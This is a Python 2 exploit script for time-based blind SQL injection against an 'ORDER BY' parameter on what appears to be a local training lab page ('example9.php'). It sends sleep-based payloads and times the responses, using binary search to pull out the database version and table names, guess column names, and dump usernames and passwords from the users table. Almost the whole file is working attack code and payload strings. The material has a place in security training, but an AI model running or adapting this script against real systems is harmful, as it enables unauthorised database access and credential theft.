#!/usr/bin/python2
# -*- coding: utf-8 -*-
import requests
from datetime import datetime
import math
import sys
try:
    from BeautifulSoup import BeautifulSoup
except ImportError:
    from bs4 import BeautifulSoup

def timer(uri):
    t1 = datetime.now()
    print "uri: ", uri
    r = requests.get(uri)
    t2 = datetime.now()
    return (t2 - t1).total_seconds()

def check_length(uri, length, mode, timeout, threshold):
    uri = uri.format(mode, length, timeout)
    if timer(uri) > threshold:
        return True
    else:
        return False

def check_count(uri, count, mode, timeout, threshold):
    uri = uri.format(mode, count, timeout)
    if timer(uri) > threshold:
        return True
    else:
        return False

def check_character(uri, character, position, mode, timeout, threshold):
    uri = uri.format(position, mode, character, timeout)
    if timer(uri) > threshold:
        return True
    else:
        return False

def check_row_length(uri, row_offset, length, mode, timeout, threshold):
    uri = uri.format(row_offset, mode, length, timeout)
    if timer(uri) > threshold:
        return True
    else:
        return False

def check_row_character(uri, character, position, mode, offset, timeout, threshold):
    uri = uri.format(position, offset, mode, character, timeout)
    if timer(uri) > threshold:
        return True
    else:
        return False

def check_column_exist(uri, user, timeout, threshold):
    uri = uri.format(user, timeout)
    if timer(uri) > threshold:
        return True
    else:
        return False

def binary_search_len(uri, interval, timeout, threshold):

    min_i = interval[0]
    max_i = interval[1]
    while True:
        middle = (min_i + max_i) / 2
        if max_i - min_i == 1:
            if check_length(uri, max_i, "=", timeout, threshold):
                return max_i 
            else:
                print "Something went wrong and you shouldn't land here."
                sys.exit(-1)
        if check_length(uri, middle, ">", timeout, threshold):
            min_i = middle
        else:
            max_i = middle

def binary_search_count(uri, interval, timeout, threshold):

    min_i = interval[0]
    max_i = interval[1]
    while True:
        middle = (min_i + max_i) / 2
        if max_i - min_i == 1:
            if check_count(uri, max_i, "=", timeout, threshold):
                return max_i 
            else:
                print "Something went wrong and you shouldn't land here."
                sys.exit(-1)
        if check_count(uri, middle, ">", timeout, threshold):
            min_i = middle
        else:
            max_i = middle

def binary_search_character(uri, interval, position, timeout, threshold):

    min_i = interval[0]
    max_i = interval[1]
    while True:
        middle = (min_i + max_i) / 2
        if max_i - min_i == 1:
            if check_character(uri, max_i, position, "=", timeout, threshold):
                return max_i 
            else:
                print "Something went wrong and you shouldn't land here."
                sys.exit(-1)
        if check_character(uri, middle, position, ">", timeout, threshold):
            min_i = middle
        else:
            max_i = middle

def binary_search_word(uri, interval, length, timeout, threshold):

    word = ""
    for p in range(1, length + 1):
        word += chr(binary_search_character(uri, interval, p, timeout, threshold))
    return word

def binary_search_row_len(uri, row_offset, interval, timeout, threshold):
    min_i = interval[0]
    max_i = interval[1]
    while True:
        middle = (min_i + max_i) / 2
        if max_i - min_i == 1:
            if check_row_length(uri, row_offset, max_i, "=", timeout, threshold):
                return max_i 
            else:
                print "Something went wrong and you shouldn't land here."
                sys.exit(-1)
        if check_row_length(uri, row_offset, middle, ">", timeout, threshold):
            min_i = middle
        else:
            max_i = middle

def binary_search_row_character(uri, row_offset, interval, position, timeout, threshold):

    min_i = interval[0]
    max_i = interval[1]
    while True:
        middle = (min_i + max_i) / 2
        if max_i - min_i == 1:
            if check_row_character(uri, max_i, position, "=", row_offset, timeout, threshold):
                return max_i 
            else:
                print "Something went wrong and you shouldn't land here."
                sys.exit(-1)
        if check_row_character(uri, middle, position, ">", row_offset, timeout, threshold):
            min_i = middle
        else:
            max_i = middle

def binary_search_row_word(uri, row_offset, interval, length, timeout, threshold):

    word = ""
    for p in range(1, length + 1):
        word += chr(binary_search_row_character(uri, row_offset, interval, p, timeout, threshold))
        #print "word =", word
    return word

def binary_search_rows_tables(uri_input_tables_cnt, uri_input_nth_row_table_len, uri_input_nth_row_table, interval_len, interval_char, timeout, threshold):

    tables = []
    num_tables = binary_search_len(uri_input_tables_cnt, interval_len, timeout, threshold)
    for n in range(num_tables):
        row_len = binary_search_row_len(uri_input_nth_row_table_len, n, interval_len, timeout, threshold)
        row_value = binary_search_row_word(uri_input_nth_row_table, n, interval_char, row_len, timeout, threshold)
        tables.append(row_value)
    return tables

#input_users_cnt = "order=name or if ((select count({}) from users){}{},sleep({}),null)%23"
#input_nth_row_users_len = "order=name or if((select length({}) from users limit {},1){}{},sleep({}),null)%23"
#input_nth_row_users = "order=name or if ((select ascii(substring({},{},1)) from users limit {},1){}{},sleep({}),null)%23"
def binary_search_rows_users_username(uri_input_users_cnt, uri_input_nth_row_users_len, uri_input_nth_row_users, interval_len, interval_char, timeout, threshold):

    entries = []
    num_entries = binary_search_len(uri_input_users_cnt, interval_len, timeout, threshold)
    for n in range(num_entries):
        row_len = binary_search_row_len(uri_input_nth_row_users_len, n, interval_len, timeout, threshold)
        row_value = binary_search_row_word(uri_input_nth_row_users, n, interval_char, row_len, timeout, threshold)
        entries.append(row_value)
    return entries

def binary_search_rows_users_password(uri_input_users_cnt, uri_input_nth_row_users_len, uri_input_nth_row_users, interval_len, interval_char, timeout, threshold):

    entries = []
    num_entries = binary_search_len(uri_input_users_cnt, interval_len, timeout, threshold)
    for n in range(num_entries):
        row_len = binary_search_row_len(uri_input_nth_row_users_len, n, interval_len, timeout, threshold)
        row_value = binary_search_row_word(uri_input_nth_row_users, n, interval_char, row_len, timeout, threshold)
        entries.append(row_value)
    return entries

interval_len = [0, 100]
interval_char = [31, 128]
timeout = 0.02
threshold = 0.02
URI = "http://localhost:7777/sqli/example9.php?"
input_1 = "order=name or sleep({})%23".format(timeout)
input_ver_len = "order=name or if(length(version()){}{},sleep({}),null)%23"
input_version = "order=name or if(ascii(substring(version(),{},1)){}{},sleep({}),null)%23"
input_db_len = "order=name or if(length(database()){}{},sleep({}),null)%23"
input_database = "order=name or if(ascii(substring(database(),{},1)){}{},sleep({}),null)%23"
input_user_len = "order=name or if(length(user()){}{},sleep({}),null)%23"
input_user = "order=name or if(ascii(substring(user(),{},1)){}{},sleep({}),null)%23"
input_tables_cnt = "order=name or if((select count(*) from information_schema.tables where table_schema=database()){}{},sleep({}),null)%23"
input_nth_row_table_len = "order=name or if((select length(table_name) from information_schema.tables where table_schema=database() limit {},1){}{},sleep({}),null)%23"
input_nth_row_table = "order=name or if((select ascii(substring(table_name,{},1)) from information_schema.tables where table_schema=database() limit {},1){}{},sleep({}),null) %23"
input_valid_column = "order=name or if((select count({}) from users)>0,sleep({}),null)%23"
input_users_cnt = "order=name or if ((select count(*) from users){}{},sleep({}),null)%23"
input_nth_row_users_username_len = "order=name or if((select length(name) from users limit {},1){}{},sleep({}),null)%23"
input_nth_row_users_username = "order=name or if ((select ascii(substring(name,{},1)) from users limit {},1){}{},sleep({}),null)%23"
input_nth_row_users_password_len = "order=name or if((select length(passwd) from users limit {},1){}{},sleep({}),null)%23"
input_nth_row_users_password = "order=name or if ((select ascii(substring(passwd,{},1)) from users limit {},1){}{},sleep({}),null)%23"

if timer(URI + input_1) > threshold:
    print "Example9 is likely time-based blind SQL-injectable with the following URL:"
    print URI + input_1
DBMS_version = binary_search_word(URI + input_version, interval_char, binary_search_len(URI + input_ver_len, interval_len, timeout, threshold), timeout, threshold)
print "DBMS version:", DBMS_version
Tables = binary_search_rows_tables(URI + input_tables_cnt, URI + input_nth_row_table_len, URI + input_nth_row_table, interval_len, interval_char, timeout, threshold)
print "Tables:", ",".join(Tables)

# Since mysql_real_escape_string() is in act, we can't use quotes in queries -> we can't enumerate columns and concat
# different fields. We resort to guessing user and password fields. We resort to guessing user and password fields.
users = [ "username", "name", "userid" ]
for u in users:
    if check_column_exist(URI + input_valid_column, u, timeout, threshold):
        print "Column {} might represent a username".format(u)
passwords = [ "password", "passwd", "pw" ]
for p in passwords:
    if check_column_exist(URI + input_valid_column, p, timeout, threshold):
        print "Column {} might represent a password".format(p)
usernames = binary_search_rows_users_username(URI + input_users_cnt, URI + input_nth_row_users_username_len, URI + input_nth_row_users_username, interval_len, interval_char, timeout, threshold)
passwords = binary_search_rows_users_password(URI + input_users_cnt, URI + input_nth_row_users_password_len, URI + input_nth_row_users_password, interval_len, interval_char, timeout, threshold)
print "Credentials:", ",".join("{}:{}".format(x, y) for x, y in zip(usernames, passwords))
